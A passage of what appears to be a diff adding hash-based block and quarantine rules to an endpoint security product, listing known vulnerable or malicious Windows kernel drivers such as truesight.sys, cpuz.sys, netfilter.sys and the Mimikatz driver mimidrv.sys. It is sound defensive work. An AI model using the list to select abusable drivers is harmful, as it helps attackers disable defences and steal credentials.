+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8f64da6-f191-521d-ad8e-adfa0bee29ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146911Z",
+ "creation_date": "2026-03-23T11:45:31.146913Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d32183f339f98b5d4d3e6b729c75bb354d9220500fe93c4f169be22b1bde50a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8fc34a8-268b-5af5-bdfa-3daf4597ceaa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484302Z",
+ "creation_date": "2026-03-23T11:45:31.484305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484314Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c318bdbf026513af53c16b81e77e1bb37c98b78e1b78d23f1abb6257c60ad29",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8fef551-ae86-5821-8a81-294147a66fd1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474118Z",
+ "creation_date": "2026-03-23T11:45:30.474122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b32ef857f7603af679fb794432c9c1ecab0ca7a0ac2ae4dd4fd5e80e05d8bb30",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c901489a-86a3-5c9f-8563-524806a96cbe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967746Z",
+ "creation_date": "2026-03-23T11:45:29.967748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55881408b405194f63c04de52b1701d964f942ac191ed1fc2e572159e7e94476",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c908ac86-caa8-5135-80a2-0e3f2bbe39b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981995Z",
+ "creation_date": "2026-03-23T11:45:29.981997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd243e33fa80f4bd6010c23ecdf94b6008fee30df248255dcfe014c91f2ce2af",
+ "comment": "Malicious Kernel Driver (aka wantd_6.sys) [https://www.loldrivers.io/drivers/127cde1d-905e-4c67-a2c3-04ea4deaea7d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c919dafb-bf72-5844-b498-5993d9ca714f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825751Z",
+ "creation_date": "2026-03-23T11:45:31.825753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4f002bfa2eca3bd8f1940c4f8dcefe4db1934d50bd8612eafe6244b1fff9884",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c924f8df-5475-58cd-a569-1ee79a407ba9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475387Z",
+ "creation_date": "2026-03-23T11:45:30.475390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "40263b08b3c3659529ab605d1daa3033db0fdc4b19c26aa375be0c19686807e6",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotnap.sys) [https://www.loldrivers.io/drivers/75a66604-f024-4f11-8ba7-fdd64a0df3bf/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9547e16-86aa-560f-bd9f-1fecc37c2810",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487576Z",
+ "creation_date": "2026-03-23T11:45:31.487578Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74a3e72507f758e4d2eca2462db3a24e59d6cec48d7f9600b9f40c09a385d395",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c95bd541-e9c1-5dee-bbc4-c1c2e720ab6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473281Z",
+ "creation_date": "2026-03-23T11:45:30.473284Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473293Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8ffe83919afc08a430c017a98e6ace3d9cbd7258c16c09c4f3a4e06746fc80a",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c95c795d-cc4e-56f3-851b-de98a8abc372",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618659Z",
+ "creation_date": "2026-03-23T11:45:29.618661Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618667Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2f5db10a59577aeff8550a58f9d96ce8aa8c1a13f96814cd0f4bb03274968e9",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c964705f-238e-53ef-a9bc-bcc741943241",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819390Z",
+ "creation_date": "2026-03-23T11:45:31.819394Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819402Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82fead4660edf201ea2af810fe6e1df22636c736b5165575b5f4a6ad5a4a050d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c96bdbfb-02fe-5bfd-a6bd-8cef6855df6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614334Z",
+ "creation_date": "2026-03-23T11:45:29.614336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614341Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9738c1d-b259-59fd-9d8f-f32e49189254",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155770Z",
+ "creation_date": "2026-03-23T11:45:31.155772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "887c3e1fb16b423a347fe8e9f46fd67ba7fab3f757d81c834cb26cc3ef7104cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c97e7f4a-062d-550d-a4e8-ef0741e45ca4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818631Z",
+ "creation_date": "2026-03-23T11:45:30.818633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9919d1546c7dfef62ff01b87f739812de0a57463611c12012013ae689023ce1",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9815b78-1b4f-523b-bccc-81d635dd7a50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835537Z",
+ "creation_date": "2026-03-23T11:45:30.835539Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835545Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec22aea52bdb4195c2f898a8ad3604493bdc28497e7c5ad12a08bc92c8748461",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c990cedd-13f3-590f-9cae-1aaa570c12b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146114Z",
+ "creation_date": "2026-03-23T11:45:31.146116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2a48a71d21867d3d1406a6d82c239b857f3c3c5598389869753ec911847d95a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c99eeea0-6fe0-5d5d-9030-941f3562a441",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821272Z",
+ "creation_date": "2026-03-23T11:45:30.821275Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a34e45e5bbec861e937aefb3cbb7c8818f72df2082029e43264c2b361424cbb1",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c99f9cb2-2b43-5bee-98d2-3deb3d30b994",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822836Z",
+ "creation_date": "2026-03-23T11:45:30.822838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3d1bdd4ad819b99870b6e2ed3527dfc0e3ce27b929ad64382b9c3d4e332315c",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9a96a76-d53d-59a3-82bd-8825a5601dbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820668Z",
+ "creation_date": "2026-03-23T11:45:30.820670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5aee1bae73d056960b3a2d2e24ea07c44358dc7bc3f8ac58cc015cccc8f8d89c",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9b0b0cf-05ab-5fa8-b972-c94d650a610b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827786Z",
+ "creation_date": "2026-03-23T11:45:30.827788Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827793Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5747b57c3bcd4ddcc84876b1c298e9ff8b6a91831217a1d0d6a1d73567f5aae1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9b5dadc-7bbe-5443-9efe-3a22f1750015",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479862Z",
+ "creation_date": "2026-03-23T11:45:31.479866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479893Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb9c54dea38d847c00d0ec7195b5b8fe0326ae4922c6c84b1e4c29acc7507c16",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9b7be35-5e2a-54e7-b77d-b48ce2fe6831",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464174Z",
+ "creation_date": "2026-03-23T11:45:30.464177Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464186Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "469713c76c7a887826611b8c7180209a8bb6250f91d0f1eb84ac4d450ef15870",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c9b83c5e-c477-55e0-ae14-5bef9b69268d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
